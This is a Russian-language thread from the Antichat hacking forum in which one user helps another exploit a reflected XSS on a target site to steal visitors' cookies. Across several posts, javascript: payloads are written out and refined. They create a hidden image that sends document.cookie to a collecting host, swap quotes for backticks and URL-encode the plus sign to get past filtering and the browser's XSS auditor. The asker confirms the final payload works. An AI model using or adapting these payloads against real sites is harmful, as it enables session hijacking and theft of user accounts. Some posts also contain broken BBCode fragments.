Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Как заюзать reflective XSS? (https://forum.antichat.xyz/showthread.php?t=454401)

Dominant 07.08.2017 23:54
Есть reflected XSS и вот такой код отрабатывает:

javascript:alert(1)

Но вот такой:

">alert(1)

проходит но уже блочится xss auditor-oом.

Можно как-то слить куки не добавляя внутрь страницы ?

crlf 08.08.2017 01:22
Можно так:

Код:
Code:
javascript:i=document.createElement('img');i.style.display='none';i.src='http://localhost/?'+escape(document.cookie);console.log(document.body.appendChild(i));
Если есть переносы строк или символы ломающие синтаксис, то нужно использовать urlencode.

Dominant 08.08.2017 16:10
Забыл упомянуть важную деталь. Инъекция в коде страницы отображается как атрибут src:

src="javascript:alert(1)"

Когда добавляю этот код:

javascript:i=document.createElement('img');i.style .display='none';i.src='http://localhost/?'+escape(document.cookie);console.log(document.bo dy.appendChild(i));

то не отображается и не отрабатывает никак

crlf 08.08.2017 16:49
Цитата:
Сообщение от Dominant
Dominant said:

Инъекция в коде страницы отображается как атрибут src
Выложи сюда, посмотрим.

Dominant 08.08.2017 17:02
Код:
Code:
site.com/index.php?goto=javascript:alert(1);
Вот такой запрос даёт:

Код:
Code:
Такой

Код:
Code:
site.com/index.php?goto=">alert(a);
Даёт:

Код:
Code:
alert(a);" name="main" scrolling="auto" NORESIZE frameborder="0" marginwidth="20" marginheight="20" border="no">
но блочится xss аудитором

Такой:

Код:
Code:
site.com/index.php?goto=javascript:i=document.createElement('img');i.style.display='none';i.src='http://localhost/?'+escape(document.cookie);console.log(document.body.appendChild(i));
не выдает ничего

crlf 08.08.2017 17:23
У меня нормально отрабатывает:

http://s018.radikal.ru/i512/1708/13/002a4d5c8506.png

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

[/COLOR][/COLOR

Dominant 08.08.2017 17:36
Цитата:
Сообщение от crlf
crlf said:

У меня нормально отрабатывает:
http://s018.radikal.ru/i512/1708/13/002a4d5c8506.png
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

[/COLOR][/COLOR
Но при вводе такого кода в адресную строку - фрейм вообще не добавляется.

Проверил - сбой происходит на "http://". Если убрать их из скрипта то всё добавляется в src но кавычки фильтруются:

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR
Без указания протокола нормально

crlf 08.08.2017 18:29
Кавычку можно бэктиком (`) заменить. Плюс нужно заменить на %2B.

Код:
Code:
site.com/index.php?goto=javascript:i=document.createElement(`img`);i.style.display=`none`;i.src=`//localhost/aaaaaaa?`%2Bescape(document.cookie);console.log(document.body.appendChild(i));

Dominant 08.08.2017 21:44
Цитата:
Сообщение от crlf
crlf said:

Кавычку можно бэктиком (`) заменить. Плюс нужно заменить на %2B.
Код:
Code:
site.com/index.php?goto=javascript:i=document.createElement(`img`);i.style.display=`none`;i.src=`//localhost/aaaaaaa?`%2Bescape(document.cookie);console.log(document.body.appendChild(i));
Вот так заработало. Спасибо


Время: 09:24